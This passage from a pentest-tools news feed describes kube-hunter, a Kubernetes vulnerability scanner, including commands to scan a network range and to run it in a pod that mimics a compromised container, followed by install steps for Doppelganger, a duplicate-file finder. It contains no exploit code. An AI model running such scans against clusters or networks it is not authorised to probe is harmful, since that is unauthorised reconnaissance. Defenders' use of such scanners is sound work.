VM, rather than those of your machine. By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.docker run –rm aquasec/kube-hunter –cidr 192.168.0.0/24PodThis option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.The job.yaml file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.Run the job with kubectl create with that yaml file.Find the pod name with kubectl describe job kube-hunterView the test results with kubectl logs Download Kube-Hunter

Link: http://feedproxy.google.com/~r/PentestTools/~3/Dr1bT8peAAc/kube-hunter-hunt-for-security.html

Doppelganger – Python Script To Scan Duplicate Copies In A Given Directory

Doppelganger is a python script to scan duplicate copies in a given directory. This tool compare not only file names, but also file hashes to ensure no false search results.FeaturesFind duplicate musicFind duplicate videosFind duplicate picturesFind duplicate documentsHow doppelganger search duplicate filesHow to Install and Run in Linux[1] Enter the following command in the terminal to download it.git clone https://github.com/Sameera-Madhushan/Doppelganger[2] After downloading the program, enter the following command to navigate to the Digger directory and listing the contentscd Doppelganger && ls[3] Now run the script with following command.python3 doppelganger.pyHow to Install and Run in Windows[1] Download and run Python 2.7.x and Python 3.7 setup file from Python.orgIn Install Python 3.7, enable Add Python 3.6 to PATH [2] Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.[3] Afther that, Run Command Propmt and enter this commands:cd Doppelganger python3 doppelganger.py Download Doppelganger

Link: http://feedproxy.google.com/~r/PentestTools/~3/cKnwHPtVRVY/doppelganger-python-script-to-scan.html